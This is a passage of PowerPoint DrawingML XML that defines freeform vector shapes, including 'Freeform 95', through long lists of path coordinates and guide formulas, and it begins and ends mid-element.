                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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14" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
